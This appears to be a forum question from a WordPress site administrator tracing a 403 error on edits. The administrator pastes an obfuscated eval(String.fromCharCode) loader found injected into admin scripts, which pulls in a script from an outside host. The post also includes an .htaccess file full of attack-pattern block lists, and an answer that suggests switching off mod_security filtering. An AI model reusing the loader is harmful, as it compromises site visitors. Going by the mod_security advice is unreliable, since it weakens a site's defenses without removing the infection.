# Post event trying to sneak in malware code when saving edits on wordpress page

Tags: jquery, wordpress, malware

I have difficulties updating the homepage of my WordPress website but the post triggers an error.
I took a look at the source and noticed that the post action loads a javascript file that has a malware code embedded in some of the files referenced in the url.

The suspicious javascript being called is

```
<script type='text/javascript' src='http://motac.gov.gh/wp-admin/load-scripts.php?c=0&amp;load%5B%5D=jquery-ui-resizable,jquery-ui-button,jquery-ui-position,jquery-ui-dialog,wpdialogs,hoverIntent,common,admin-bar,heartbeat,autosa&amp;load%5B%5D=ve,wp-ajax-response,jquery-color,wp-lists,quicktags,jquery-query,admin-comments,suggest,jquery-ui-sortable,postbox,jquery-ui-men&amp;load%5B%5D=u,wp-a11y,jquery-ui-autocomplete,tags-suggest,tags-box,underscore,word-count,post,editor-expand,thickbox,shortcode,backbone,wp-u&amp;load%5B%5D=til,wp-backbone,media-models,wp-plupload,wp-mediaelement,wp-api-request,media-views,media-editor,media-audiovideo,mce-view,imgar&amp;load%5B%5D=easelect,image-edit,svg-painter,wp-auth-check,wp-pointer,jquery-ui-droppable,jquery-ui-tabs,jquery-ui-accordion,editor,wplink,me&amp;load%5B%5D=dia-upload,wp-embed&amp;ver=4.9.8'></script>
```

and the resultant js file contains this piece of code which is injected in 3 different areas and i suspect to be the malware:

```
eval(String.fromCharCode(118, 97, 114, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 116, 121, 112, 101, 32, 61, 32, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 32, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 97, 115, 121, 110, 99, 32, 61, 32, 116, 114, 117, 101, 59, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 46, 115, 114, 99, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 44, 32, 52, 54, 44, 32, 49, 49, 48, 44, 32, 49, 48, 49, 44, 32, 49, 49, 54, 44, 32, 52, 55, 44, 32, 49, 49, 53, 44, 32, 49, 49, 54, 44, 32, 57, 55, 44, 32, 49, 49, 54, 44, 32, 52, 54, 44, 32, 49, 48, 54, 44, 32, 49, 49, 53, 44, 32, 54, 51, 44, 32, 49, 49, 56, 44, 32, 54, 49, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 44, 32, 52, 54, 44, 32, 53, 48, 41, 59, 32, 32, 32, 118, 97, 114, 32, 97, 108, 108, 115, 32, 61, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 118, 97, 114, 32, 110, 116, 51, 32, 61, 32, 116, 114, 117, 101, 59, 32, 102, 111, 114, 32, 40, 32, 118, 97, 114, 32, 105, 32, 61, 32, 97, 108, 108, 115, 46, 108, 101, 110, 103, 116, 104, 59, 32, 105, 45, 45, 59, 41, 32, 123, 32, 105, 102, 32, 40, 97, 108, 108, 115, 91, 105, 93, 46, 115, 114, 99, 46, 105, 110, 100, 101, 120, 79, 102, 40, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 49, 44, 32, 49, 50, 48, 44, 32, 57, 55, 44, 32, 49, 48, 57, 44, 32, 49, 48, 52, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 44, 32, 49, 48, 49, 41, 41, 32, 62, 32, 45, 49, 41, 32, 123, 32, 110, 116, 51, 32, 61, 32, 102, 97, 108, 115, 101, 59, 125, 32, 125, 32, 105, 102, 40, 110, 116, 51, 32, 61, 61, 32, 116, 114, 117, 101, 41, 123, 100, 111, 99, 117, 109, 101, 110, 116, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 34, 104, 101, 97, 100, 34, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 111, 109, 101, 115, 116, 114, 105, 110, 103, 41, 59, 32, 125));
```

I suspected from the resultant js file that the likely sources for the code could be the Jquery UI Dialog and the jQuery UI Autocomplete files.

I went into these files to look for the malicious code but couldn't find it. I run a grep on the entire parent directory looking for the string "eval(String.fromCharCode" but nothing came up.

I dont know where else to look and not sure how to prevent the injection of the malware into the code.

The resultant js file is over 80,000 characters and wont fit into the question.

How can i go about tracking the source of the malware and shutting it out without compromising the customizations on the page being edited?

This is what my HTACCESS FILE looks like

```
# BEGIN All In One WP Security
#AIOWPS_BASIC_HTACCESS_RULES_START
<Files .htaccess>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
ServerSignature Off
LimitRequestBody 10240000
<Files wp-config.php>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
#AIOWPS_BASIC_HTACCESS_RULES_END
#AIOWPS_PINGBACK_HTACCESS_RULES_START
<Files xmlrpc.php>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
#AIOWPS_PINGBACK_HTACCESS_RULES_END
#AIOWPS_DEBUG_LOG_BLOCK_HTACCESS_RULES_START
<Files debug.log>
<IfModule mod_authz_core.c>
Require all denied
</IfModule>
<IfModule !mod_authz_core.c>
Order deny,allow
Deny from all
</IfModule>
</Files>
#AIOWPS_DEBUG_LOG_BLOCK_HTACCESS_RULES_END
#AIOWPS_DISABLE_INDEX_VIEWS_START
Options -Indexes
#AIOWPS_DISABLE_INDEX_VIEWS_END
#AIOWPS_DISABLE_TRACE_TRACK_START
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
</IfModule>
#AIOWPS_DISABLE_TRACE_TRACK_END
#AIOWPS_FORBID_PROXY_COMMENTS_START
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^POST
RewriteCond %{HTTP:VIA} !^$ [OR]
RewriteCond %{HTTP:FORWARDED} !^$ [OR]
RewriteCond %{HTTP:USERAGENT_VIA} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_FOR} !^$ [OR]
RewriteCond %{HTTP:X_FORWARDED_HOST} !^$ [OR]
RewriteCond %{HTTP:PROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:XPROXY_CONNECTION} !^$ [OR]
RewriteCond %{HTTP:HTTP_PC_REMOTE_ADDR} !^$ [OR]
RewriteCond %{HTTP:HTTP_CLIENT_IP} !^$
RewriteRule wp-comments-post\.php - [F]
</IfModule>
#AIOWPS_FORBID_PROXY_COMMENTS_END
#AIOWPS_DENY_BAD_QUERY_STRINGS_START
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} ftp:     [NC,OR]
RewriteCond %{QUERY_STRING} http:    [NC,OR]
RewriteCond %{QUERY_STRING} https:   [NC,OR]
RewriteCond %{QUERY_STRING} mosConfig [NC,OR]
RewriteCond %{QUERY_STRING} ^.*(globals|encode|localhost|loopback).* [NC,OR]
RewriteCond %{QUERY_STRING} (\;|'|\"|%22).*(request|insert|union|declare|drop) [NC]
RewriteRule ^(.*)$ - [F,L]
</IfModule>
#AIOWPS_DENY_BAD_QUERY_STRINGS_END
#AIOWPS_ADVANCED_CHAR_STRING_FILTER_START
<IfModule mod_alias.c>
RedirectMatch 403 \,
RedirectMatch 403 \:
RedirectMatch 403 \;
RedirectMatch 403 \=
RedirectMatch 403 \[
RedirectMatch 403 \]
RedirectMatch 403 \^
RedirectMatch 403 \`
RedirectMatch 403 \{
RedirectMatch 403 \}
RedirectMatch 403 \~
RedirectMatch 403 \"
RedirectMatch 403 \$
RedirectMatch 403 \<
RedirectMatch 403 \>
RedirectMatch 403 \|
RedirectMatch 403 \.\.
RedirectMatch 403 \%0
RedirectMatch 403 \%A
RedirectMatch 403 \%B
RedirectMatch 403 \%C
RedirectMatch 403 \%D
RedirectMatch 403 \%E
RedirectMatch 403 \%F
RedirectMatch 403 \%22
RedirectMatch 403 \%27
RedirectMatch 403 \%28
RedirectMatch 403 \%29
RedirectMatch 403 \%3C
RedirectMatch 403 \%3E
RedirectMatch 403 \%3F
RedirectMatch 403 \%5B
RedirectMatch 403 \%5C
RedirectMatch 403 \%5D
RedirectMatch 403 \%7B
RedirectMatch 403 \%7C
RedirectMatch 403 \%7D
# COMMON PATTERNS
Redirectmatch 403 \_vpi
RedirectMatch 403 \.inc
Redirectmatch 403 xAou6
Redirectmatch 403 db\_name
Redirectmatch 403 select\(
Redirectmatch 403 convert\(
Redirectmatch 403 \/query\/
RedirectMatch 403 ImpEvData
Redirectmatch 403 \.XMLHTTP
Redirectmatch 403 proxydeny
RedirectMatch 403 function\.
Redirectmatch 403 remoteFile
Redirectmatch 403 servername
Redirectmatch 403 \&rptmode\=
Redirectmatch 403 sys\_cpanel
RedirectMatch 403 db\_connect
RedirectMatch 403 doeditconfig
RedirectMatch 403 check\_proxy
Redirectmatch 403 system\_user
Redirectmatch 403 \/\(null\)\/
Redirectmatch 403 clientrequest
Redirectmatch 403 option\_value
RedirectMatch 403 ref\.outcontrol
# SPECIFIC EXPLOITS
RedirectMatch 403 errors\.
RedirectMatch 403 config\.
RedirectMatch 403 include\.
RedirectMatch 403 display\.
RedirectMatch 403 register\.
Redirectmatch 403 password\.
RedirectMatch 403 maincore\.
RedirectMatch 403 authorize\.
Redirectmatch 403 macromates\.
RedirectMatch 403 head\_auth\.
RedirectMatch 403 submit\_links\.
RedirectMatch 403 change\_action\.
Redirectmatch 403 com\_facileforms\/
RedirectMatch 403 admin\_db\_utilities\.
RedirectMatch 403 admin\.webring\.docs\.
Redirectmatch 403 Table\/Latest\/index\.
</IfModule>
#AIOWPS_ADVANCED_CHAR_STRING_FILTER_END
#AIOWPS_SIX_G_BLACKLIST_START
# 6G FIREWALL/BLACKLIST
# @ https://perishablepress.com/6g/

# 6G:[QUERY STRINGS]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{QUERY_STRING} (eval\() [NC,OR]
RewriteCond %{QUERY_STRING} (127\.0\.0\.1) [NC,OR]
RewriteCond %{QUERY_STRING} ([a-z0-9]{2000,}) [NC,OR]
RewriteCond %{QUERY_STRING} (javascript:)(.*)(;) [NC,OR]
RewriteCond %{QUERY_STRING} (base64_encode)(.*)(\() [NC,OR]
RewriteCond %{QUERY_STRING} (GLOBALS|REQUEST)(=|\[|%) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C)(.*)script(.*)(>|%3) [NC,OR]
RewriteCond %{QUERY_STRING} (\|\.\.\.|\.\./|~|`|<|>|\|) [NC,OR]
RewriteCond %{QUERY_STRING} (boot\.ini|etc/passwd|self/environ) [NC,OR]
RewriteCond %{QUERY_STRING} (thumbs?(_editor|open)?|tim(thumb)?)\.php [NC,OR]
RewriteCond %{QUERY_STRING} ('|\")(.*)(drop|insert|md5|select|union) [NC]
RewriteRule .* - [F]
</IfModule>

# 6G:[REQUEST METHOD]
<IfModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} ^(connect|debug|move|put|trace|track) [NC]
RewriteRule .* - [F]
</IfModule>

# 6G:[REFERRERS]
<IfModule mod_rewrite.c>
RewriteCond %{HTTP_REFERER} ([a-z0-9]{2000,}) [NC,OR]
RewriteCond %{HTTP_REFERER} (semalt.com|todaperfeita) [NC]
RewriteRule .* - [F]
</IfModule>

# 6G:[REQUEST STRINGS]
<IfModule mod_alias.c>
RedirectMatch 403 (?i)([a-z0-9]{2000,})
RedirectMatch 403 (?i)(https?|ftp|php):/
RedirectMatch 403 (?i)(base64_encode)(.*)(\()
RedirectMatch 403 (?i)(=\'|=\%27|/\'/?)\.
RedirectMatch 403 (?i)/(\$(\&)?|\*|\"|\.|,|&|&amp;?)/?$
RedirectMatch 403 (?i)(\{0\}|\(/\(|\.\.\.|\+\+\+|\\"\\")
RedirectMatch 403 (?i)(~|`|<|>|:|;|,|%|\|\s|\{|\}|\[|\]|\|)
RedirectMatch 403 (?i)/(=|\$&|_mm|cgi-|etc/passwd|muieblack)
RedirectMatch 403 (?i)(&pws=0|_vti_|\(null\)|\{\$itemURL\}|echo(.*)kae|etc/passwd|eval\(|self/environ)
RedirectMatch 403 (?i)\.(aspx?|bash|bak?|cfg|cgi|dll|exe|git|hg|ini|jsp|log|mdb|out|sql|svn|swp|tar|rar|rdf)$
RedirectMatch 403 (?i)/(^$|(wp-)?config|mobiquo|phpinfo|shell|sqlpatch|thumb|thumb_editor|thumbopen|timthumb|webshell)\.php
</IfModule>

# 6G:[USER AGENTS]
<IfModule mod_setenvif.c>
SetEnvIfNoCase User-Agent ([a-z0-9]{2000,}) bad_bot
SetEnvIfNoCase User-Agent (archive.org|binlar|casper|checkpriv|choppy|clshttp|cmsworld|diavol|dotbot|extract|feedfinder|flicky|g00g1e|harvest|heritrix|httrack|kmccrew|loader|miner|nikto|nutch|planetwork|postrank|purebot|pycurl|python|seekerspider|siclab|skygrid|sqlmap|sucker|turnit|vikspider|winhttp|xxxyy|youda|zmeu|zune) bad_bot

# Apache < 2.3
<IfModule !mod_authz_core.c>
Order Allow,Deny
Allow from all
Deny from env=bad_bot
</IfModule>

# Apache >= 2.3
<IfModule mod_authz_core.c>
<RequireAll>
Require all Granted
Require not env bad_bot
</RequireAll>
</IfModule>
</IfModule>
#AIOWPS_SIX_G_BLACKLIST_END
#AIOWPS_FIVE_G_BLACKLIST_START
# 5G BLACKLIST/FIREWALL (2013)
# @ http://perishablepress.com/5g-blacklist-2013/

# 5G:[QUERY STRINGS]
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteCond %{QUERY_STRING} (\"|%22).*(<|>|%3) [NC,OR]
RewriteCond %{QUERY_STRING} (javascript:).*(\;) [NC,OR]
RewriteCond %{QUERY_STRING} (<|%3C).*script.*(>|%3) [NC,OR]
RewriteCond %{QUERY_STRING} (\\|\.\./|`|='$|=%27$) [NC,OR]
RewriteCond %{QUERY_STRING} (\;|'|\"|%22).*(union|select|insert|drop|update|md5|benchmark|or|and|if) [NC,OR]
RewriteCond %{QUERY_STRING} (base64_encode|localhost|mosconfig) [NC,OR]
RewriteCond %{QUERY_STRING} (boot\.ini|echo.*kae|etc/passwd) [NC,OR]
RewriteCond %{QUERY_STRING} (GLOBALS|REQUEST)(=|\[|%) [NC]
RewriteRule .* - [F]
</IfModule>

# 5G:[USER AGENTS]
<IfModule mod_setenvif.c>
# SetEnvIfNoCase User-Agent ^$ keep_out
SetEnvIfNoCase User-Agent (binlar|casper|cmsworldmap|comodo|diavol|dotbot|feedfinder|flicky|ia_archiver|jakarta|kmccrew|nutch|planetwork|purebot|pycurl|skygrid|sucker|turnit|vikspider|zmeu) keep_out
<limit GET POST PUT>
Order Allow,Deny
Allow from all
Deny from env=keep_out
</limit>
</IfModule>

# 5G:[REQUEST STRINGS]
<IfModule mod_alias.c>
RedirectMatch 403 (https?|ftp|php)\://
RedirectMatch 403 /(https?|ima|ucp)/
RedirectMatch 403 /(Permanent|Better)$
RedirectMatch 403 (\=\\\'|\=\\%27|/\\\'/?|\)\.css\()$
RedirectMatch 403 (\,|\)\+|/\,/|\{0\}|\(/\(|\.\.\.|\+\+\+|\||\\\"\\\")
RedirectMatch 403 \.(cgi|asp|aspx|cfg|dll|exe|jsp|mdb|sql|ini|rar)$
RedirectMatch 403 /(contac|fpw|install|pingserver|register)\.php$
RedirectMatch 403 (base64|crossdomain|localhost|wwwroot|e107\_)
RedirectMatch 403 (eval\(|\_vti\_|\(null\)|echo.*kae|config\.xml)
RedirectMatch 403 \.well\-known/host\-meta
RedirectMatch 403 /function\.array\-rand
RedirectMatch 403 \)\;\$\(this\)\.html\(
RedirectMatch 403 proc/self/environ
RedirectMatch 403 msnbot\.htm\)\.\_
RedirectMatch 403 /ref\.outcontrol
RedirectMatch 403 com\_cropimage
RedirectMatch 403 indonesia\.htm
RedirectMatch 403 \{\$itemURL\}
RedirectMatch 403 function\(\)
RedirectMatch 403 labels\.rdf
RedirectMatch 403 /playing.php
RedirectMatch 403 muieblackcat
</IfModule>

# 5G:[REQUEST METHOD]
<ifModule mod_rewrite.c>
RewriteCond %{REQUEST_METHOD} ^(TRACE|TRACK)
RewriteRule .* - [F]
</IfModule>
#AIOWPS_FIVE_G_BLACKLIST_END
#AIOWPS_ENABLE_BRUTE_FORCE_PREVENTION_START
RewriteEngine On
RewriteCond %{REQUEST_URI} (wp-admin|wp-login)
RewriteCond %{REQUEST_URI} !(wp-admin/admin-ajax.php)
RewriteCond %{HTTP_COOKIE} !motacs3cur1ty= [NC]
RewriteCond %{HTTP_COOKIE} !aiowps_cookie_test_ta83so6lqh= [NC]
RewriteRule .* http://127.0.0.1 [L]
#AIOWPS_ENABLE_BRUTE_FORCE_PREVENTION_END
#AIOWPS_BLOCK_SPAMBOTS_START
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{REQUEST_METHOD} POST
RewriteCond %{REQUEST_URI} ^(.*)?wp-comments-post\.php(.*)$
RewriteCond %{HTTP_REFERER} !^http(s)?://motac\.gov\.gh [NC,OR]
RewriteCond %{HTTP_USER_AGENT} ^$
RewriteRule .* http://127.0.0.1 [L]
</IfModule>
#AIOWPS_BLOCK_SPAMBOTS_END
#AIOWPS_LOGIN_WHITELIST_START
<FilesMatch "^(wp-login\.php)">
<IfModule !mod_authz_core.c>
Order Allow,Deny
Allow from motac.gov.gh

</IfModule>
<IfModule mod_authz_core.c>
Require all denied
Require local
Require ip 127.0.0.1
Require host motac.gov.gh
Require ip 154.160.22.129

</IfModule>
</FilesMatch>
#AIOWPS_LOGIN_WHITELIST_END
#AIOWPS_PREVENT_IMAGE_HOTLINKS_START
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{REQUEST_FILENAME} -f
RewriteCond %{REQUEST_FILENAME} \.(gif|jpe?g?|png)$ [NC]
RewriteCond %{HTTP_REFERER} !^http(s)?://motac\.gov\.gh [NC]
RewriteRule \.(gif|jpe?g?|png)$ - [F,NC,L]
</IfModule>
#AIOWPS_PREVENT_IMAGE_HOTLINKS_END
# END All In One WP Security

# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress

#Deny Access to wp-config
<files wp-config.php>
order allow,deny
deny from all
</files>

<IfModule mod_security.c>
SecFilterEngine Off
SecFilterScanPOST Off
</IfModule>

# Prevent Directory Browsing
Options All -Indexes

# Prevent hotlinking files
RewriteEngine on
RewriteCond %{HTTP_REFERER} !^$
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?motac.gov.gh [NC]
RewriteRule \.(jpg|jpeg|png|gif)$ - [NC,F,L]
```

Comment: what is the error that you get when updating the page ?

Comment: @AngelDeykov i get a forbidden error message "Forbidden
You don't have permission to access /wp-admin/post.php on this server." I have checked the permissions on the server and its all intact. When i try performing the same update on a different page, it updates just fine without permission errors

Comment: check my answer and add the command in your .htaccess file

Comment: Also do you have any security plugins installed ? Some misconfiguration can cause this error as well

Comment: @AngelDeykov i added the command you suggested in the htaccess file but that didnt help. I will update my question with the full .htaccess file code. What else can i try?
I noticed that if i created a new page and added the exact code from the homepage the update does not work. but when i use the same code on a different wordpress website's page it updates allright though the results isnt quite the same due to differnt themes

Comment: are you using this IP address ? - 154.160.22.129

Comment: look at the IP configuration Require local
Require ip 127.0.0.1
Require host motac.gov.gh
Require ip 154.160.22.129

Comment: @AngelDeykov i was trying to block that IP address since its been flagged for malware. What would you suggest? should i remove it?

Comment: no repost the question with .htaccess tag so some one more experienced can take a look at it, I'm not so good with server config

Answer (score 0):

Locate your .htaccess file in your root directory and add this :

```
<IfModule mod_security.c>
 SecFilterEngine Off
 SecFilterScanPOST Off
</IfModule>
```

If this doesn't help try to deactivate your plugins 1 by 1 and see some of them is causing the error

Comment: I deactivated all plugins and tried updating and the same error turns up.